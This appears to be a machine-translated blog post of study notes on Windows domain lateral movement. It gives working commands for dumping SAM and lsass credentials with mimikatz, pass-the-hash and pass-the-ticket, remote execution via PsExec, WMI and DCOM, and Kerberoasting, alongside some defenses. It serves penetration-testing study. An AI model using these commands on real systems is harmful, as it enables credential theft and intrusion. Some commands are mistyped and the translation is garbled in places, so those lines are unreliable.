Preface

Continue reading and learning this article 《 Intranet security attack and defense ： Penetration test practice guide 》, This chapter systematically introduces the main methods of lateral movement in the domain , Reproduce and analyze the most important aspects of Intranet domain 、 The most classic loophole , At the same time, the corresponding prevention methods are given

This chapter includes ：

• Analysis of common remote connection modes
• Understand... From the perspective of cryptography NTLM agreement
• PTT and PTH Principle
• How to use it PsExec、WMI、smbexec Move horizontally
• Kerberos Protocol authentication process
• Windows Certification reinforcement scheme
• Exchange Mail server penetration test

I have also studied before ： Intranet penetration series ： Summary of transverse penetration method

One 、 Commonly used Windows Remote connections and commands

1、IPC

IPC（Internet Process Connection） Is an open named pipeline for inter process communication

• You can get the corresponding permissions by verifying the user name and password
• adopt ipc$ You can establish a connection with the target machine , Using this connection, you can run commands on the target machine

Build a ipc$

net use \\192.168.1.10\ipc$ "admin123" /user:administrator

（1） Use conditions

• Turn on 139、445 port
• The administrator has enabled the default sharing

（2） The reason why the connection failed

• Wrong user name or password
• The target is not open ipc$ Default share
• Failed to successfully connect to the target 139、445 port
• Command input error

2、Windows Bring their own tools

（1）dir

In the use of net use The command establishes a connection with the remote target machine ipc$ after , have access to dir The command lists the files in the remote host

dir \\192.168.1.10\c$

（2）tasklist

In the use of net use The command establishes a connection with the remote target machine ipc$ after , have access to tasklist The command lists the processes running on the remote host

tasklist /S 192.168.1.10 /U administrator /P admin123

3、 Planning tasks

（1）at

Windows server 2008 Previous planned task commands

// Create a scheduled task and execute it regularly shell
at \\192.168.1.10 4:11PM C:\shell.bat
//  After creation, there will be a task ID, Assign tasks ID You can delete 
at \\192.168.1.10 7 /delete

（2）schtasks

Windows server 2008 Then the planned task command

// Boot from boot 
schtasks /create /s 192.168.1.10 /tn test /sc onstart /tr C:\calc.bat /ru system /f
// perform 
schtasks /run /s 192.168.1.10 /i /tn "test"
// Delete task 
schtasks /delete /s 192.168.1.10 /tn "test" /f

Two 、Windows System hash value acquisition

1、LM Hash and NTLM Hash

Windows Two methods are used to encrypt plaintext passwords ：

• LM Hash：“LAN Manager Hash”, The essence is DES encryption , Hard coded key , limit 14 position （ Inadequate supplement 0）. from Windows Vista and Windows Server 2008 Start default disable , At this time LM Hash by aad3b435b51404eeaad3b435b51404ee（ Indicates empty or disabled ）
• NTLM Hash：“New Technology LM Hash”,MD4 encryption ,Windows Vista and Windows Server 2003 After that, I used this

Hash Hashing can be done through an online database 、 Rainbow watch, etc , You can also use PTH（Pass the Hash Hash passing ） For lateral penetration

2、 Single machine password capture

You can use tools to remove hash values and plaintext passwords from memory lsass.exe A process or SAM Export from file

• Local user name 、 Hash values and other security verification information are stored in SAM In file ,SAM File save location C:\Windows\System32\config, This file is not allowed to be copied , But you can use U Disk into PE The system is copied
• lsass.exe Processes are used to implement Windows Local security policy and login policy

If you want to be in Windows Grab hash value or plaintext password in the operating system , Permission must be elevated to System

（1） Grab

export SAM Document and system file , And then through mimikatz perhaps Cain To read... From a file hash

reg save hklm\sam sam.hive
reg save hklm'system system.hive

Use task manager or Microsoft product Procdump export lsass.dmp file , adopt mimikatz To get... From a memory file hash

Procdump Download address ：https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

Some tools ：

• GetPassword
• PwDump7
• QuarksPwDump
• mimikatz
• PowerShell

（2） To guard against

Windows Server 2012 Start closing by default WDigest, Make it impossible for attackers to obtain plaintext passwords from memory

2012 The following versions , If installed KB2871997 Patch , The same effect

WDigest The function status can be viewed and modified in the registry , On and off in the command line are as follows

3、Hashcat

Hashcat Only support CPU Crack ;oclHashcat Support GPU Crack （AMD、NIVDA）, Support cracking Windows password 、Linux password 、Office password 、Wi-Fi password 、MySQL password 、SQL Server password , And by MD5、SHA1、SHA256 And other international mainstream encryption algorithms

Download address ：https://github.com/hashcat/hashcat

4、 To guard against

Preventive measures ：

• Windows Server 2012 R2 Added a new user group named protected （Protected Users）, Just put the users that need to be protected into the group , Attackers cannot use mimikatz And other tools grab plaintext passwords and hash values

• install KB2871997 Patch , Microsoft is used to solve PsExec or IPC Remote viewing （c$） Patch to the problem , It can make the local account no longer allowed to be far away 0 Access to the computer system , however SID=500 Your local administrator account （ Default Administrator） With the exception of

• Microsoft is in Windows XP A new one named WDigest The agreement , The agreement enables Windows Store the plaintext password in memory , To facilitate users to log in to the local computer . Modify registry , Make it stop doing this

• according to Debug Permissions determine which users can attach the debugger to any process or kernel , By default, only Administrator.mimikatz When fetching hash values or plaintext passwords, you need to use Debug jurisdiction （ because mimikatz Need and lsass Processes interact ）. take Administrator from Debug Remove from group

3、 ... and 、 Hash passing attack

Hash passing PTH（Pass the Hash） attack ：

• In a domain environment , When users log in to the computer, they mostly use domain accounts , Many computers will use the same local administrator account and password during installation
• Therefore, if the local administrator account and password of the computer are the same , The attacker can log in to other computers in the intranet by using the method of hash passing attack .

To put it bluntly, it is to use tools to pass hash values to other computers , Verify authority , Realize the control of remote computer

In the actual test , to update KB287l997 After, you cannot use the conventional hash transfer method to move horizontally , but Administrator account number （SID by 500） exception —— Hash transfer can still be performed using the hash value of the account , It's important to note that SID by 500 Account number （ Even if Administrator Account name change does not affect SID value ）

Four 、 Ticket delivery attack

Bill delivery （Pass the Ticket,PTT） No local administrator privileges are required

1、mimikatz

// Export bill 
mimikatz "privilege::debug" "sekurlsa::tickets /export"
// Clear the ticket in memory 
mimikatz # kerberos::purge
// Inject the ticket into memory 
mimikatz "kerberos::ptt" "C:\ticket\< Ticket file name >"

2、kekeo

kekeo You need to use a domain name 、 user name 、NTLM Hash The three cooperate to generate bills

Download address ：https://github.com/gentilkiwi/kekeo

// Generate bills 
kekeo "tft::ask /user:administrator /domin:test.com /nltm:<nltm hash  value >"
// Clear other tickets in memory 
kekeo # kerberos::pruge
// Import memory 
kerberos:: ptt < Ticket file name >

3、 To guard against

A few points ：

• Use dir On command , You must use a host name （ Use IP The address will cause an error ）
• The default effective time of note file in memory is 10 Hours
• The ticket can be delivered on the target machine without the permission of the local administrator

5、 ... and 、PsExec

PsExec It's Microsoft's official PsTools The software in the toolkit

• At the beginning of the period, it is mainly used for mass production Windows Operation and maintenance of the host , The effect is very good in the domain environment
• adopt PsExec, You can execute commands on a remote computer , You can also elevate administrator privileges to System jurisdiction To run the specified program
• Can be in Windows server 2016 And before
• Download address ：https://download.sysinternals.com/files/PSTools.zip

PsExec The basic principle of ： Create a... On the remote target computer through a pipe psexec service , And generate a file named... On the local disk “PSEXECSVC” Binary file , And then through psexec Service run command , Delete the task after running

Remote system is required to turn on admin$ share （ On by default ）, There will be a lot of logs

// obtain system jurisdiction shell（ Established ipc$）, no need -s What you get is administrator jurisdiction 
PsExec.exe -accepteula \\192.168.1.10 -s cmd.exe
// without ipc$
PsExec.exe \\192.168.1.10 -u administrator -p 123456 cmd.exe

6、 ... and 、WMI

WMI（Windows Management Instrumentation） Is the integration of a series of tools

• from Windows 98 Start supporting
• Computer systems can be managed locally or remotely
• In the use of wmiexec When moving laterally ,Windows The default is not to record WMI Operation log of

1、 Basic commands

The basic way of execution ：

wmic /node:192.168.1.10 /user:administrator /password:admin123 process call create "cmd.exe" /c ipconfig > ip.txt"

Use wmic Remote execution command , Start in the remote system Windows Management Instrumentation service （ The target server needs to be open 135 port ,wmic The command will be executed in the remote system with administrator privileges ）. If the server has a firewall on ,wmic You will not be able to connect . Besides ,wmic If the command does not echo , You can output the command results to a file , And use ipc$ and type To read information . If wmic Executing a malicious program , There will be no log

2、 Other tools

（1）impacket Medium wmiexec

kali Download impacket

• After successful connection, there will be an interactive command line
• Mainly used in linux->windows

wmiexec.py administrator:[email protected]

（2）wmiexec.vbs

wmiexec.vbs adopt VBS call WMI To simulate the PsExec The function of （ I've been investigated and killed for a long time ）

//shell
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.10 administrator admin123
// Execute a single command 
cscript.exe wmiexec.vbs /cmd 192.168.1.10 administrator admin123 "ipconfig"

（3）Invoke-WMICommand

Invoke-WMICommand yes PowerSpolit The script in the , adopt PowerShell call WMI To execute commands remotely

// Target user name 
$user = "test\administrator"
// Target password 
$password = ConverTo-SecureString -String "admin123" -AsPlainText -Force
// Integrate 
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, $password
// Remote execution 
$remote = Invoke-WmiCommand -Payload {
    ipconfig} -Credential $Cred -ComputerName 192.168.1.10
// Output 
$remote.PayloadOutput

（4）Invoke-WMIMethod

Invoke-WMIMethod yes powershell Self contained

// Target user name 
$user = "test\administrator"
// Target password 
$password = ConverTo-SecureString -String "admin123" -AsPlainText -Force
// Integrate 
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, $password
// Remote execution 
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "ipconfig" -ComputerName "192.168.1.10" -Credential $Cred

7、 ... and 、smbexec

smbexec You can use file sharing （admin＄、c＄、 ipc＄、d＄） Execute commands in a remote system

Download address ：

• C++ edition ：https://github.com/sunorr/smbexec
• Linux Remove the tool kit ：https://github.com/brav0hax/smbexec

This paper introduces the application method of

8、 ... and 、DCOM Use in remote systems

DCOM（Distributed Component Object Model, Distributed Component Object Model ） Is a series of Microsoft concepts and program interfaces

• Component based object model （COM）,COM It provides a set of interfaces that allow communication between client and server on the same computer （Win95 And after ）
• The client program object can send a request to the server program object on another computer in the network

The execution process is the same ：

• adopt ipc$ Connect to a remote computer
• Carry out orders

1、 Via local DCOM Carry out orders

obtain DCOM Program list ：

// Get-CimInstance stay PowerShell 3.0 There's only , namely server2012 And above 
Get-CimInstance Win32_DCOMApplication
// PowerShell 2.0 You can use the following command instead of 
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication

2、 Use DCOM Execute commands on remote machines

（1） call MMC20.Application Remote execution command

net use \\192.168.1.10 "admin123" /user:test\xiaom
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.10"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c cmd.exe","")

（2） call 9BA05972-F6A8-11CF-A442-00A0C90A8F39

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.1.10")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0) For details of this method, please refer to the article ：https://bbs.pediy.com/thread-226540-1.htm

Nine 、SPN Application in domain environment

Service principal name （Service Principal Name,SPN）

• A large number of applications contain a variety of resources
• Each resource is assigned a different SPN

1、SPN scanning

Because every server in the domain environment needs to be in Kerberos Register in the authentication service SPN, Therefore, the attacker will send query requests directly to the domain controller , Get the services they need SPN, So as to know which machine the service resources they need to use are on .

SPN Scanning is also called “ scanning Kerberos Service instance name ”, The best way to find services in the active directory is SPN scanning . Compared with network port scanning ,SPN The main feature of scanning is that there is no need to connect every part of the network IP Address to check the service port （ It will not trigger... In the intranet IPS、IDS And other equipment rules to generate a large number of warning logs ）. because SPN Query is Kerberos Part of the bill act , Therefore, it is difficult to detect .

PowerShell-AD-Recon The toolkit provides a series of corresponding relationships between services and service login accounts and hosts running services , Download address ：https://github.com/PyroTek3/PowerShell-AD-Recon

SPN It's through LDAP The protocol queries the domain controller , therefore , The attacker only needs to get one Common domain user permissions You can do it SPN scanning

2、Kerberoast attack

Download address ：https://github.com/nidem/kerberoast

Details available ： Intranet penetration | SPN And Kerberoast Attack explanation

And related to it Learn about gold notes and silver notes

defense ：

• Ensure that the service account password is longer than 25 position
• Ensure the randomness of the password （ Avoid the same ）
• Change your password regularly

Ten 、Exchange Mail server security

Email may contain a lot of source code 、 Enterprise internal address book 、 Plaintext password 、 The login address of sensitive services and the information that can access the intranet from the external network VPN Account password and other information

Exchange Support PowerShell Operate it locally or remotely .

Mailbox server 、 Client access server 、 Hub transmission server is the core role , As long as these three roles are deployed, basic e-mail processing functions can be provided , And these three can be deployed on the same host .

Mail sending uses a unified communication protocol , namely SMTP（ Simple mail transfer protocol ）; Mail reception will use a variety of protocol standards , If you follow POP（ Post office protocol ） Developed from POP3, And widely used IMAP（Internet Email access protocol ）.Exchange Developed private MAPI The agreement is used to receive mail

Exchange Supported access interfaces and protocols ：

• OWA（Outlook Web App）：Exchange Provided Web mailbox
• EAC（Exchange Administrative Center）：Exchange Management Center , backstage
• Outlook Anywhere（RPC-over-HTTP,RPC/HTTP）
• MAPI（MAPI-over-HTTP,MAPI/HTTP）
• Exchange ActiveSync（EAS,XML/HTTP）
• Exchange Web Service（EWS,SOAP-over-HTTP）

Exchange Service discovery ：

• Based on port scan discovery （nmap）
• SPN Inquire about （ In the installation Exchange when ,SPN Is registered in AD It's in ）

Exchange The suffix of the database is “.edb”, Stored in Exchange Server , Use PowerShell You can view the corresponding information

Exchange The file suffix of the mail is “.pst”

UNC（Universal Naming Convention, General nomenclature , Also known as the universal naming convention 、 Universal naming convention ）. Be similar to \\hostname\sharename,\\ip\address\sharename Your network path is UNC route ,sharename Name the network share

Check the mail database

// Installation commands are required before querying 
add-pssnapin microsoft.exchange *
Get-MailboxDatabase -server "Exchange1"
Get-MailboxDatabase -Identity 'Mailbox Database 1894576043' | Format-List Name,EdbFilePath,LogFolderPath

Conclusion

Some classic lateral movement methods
Many have been killed and have been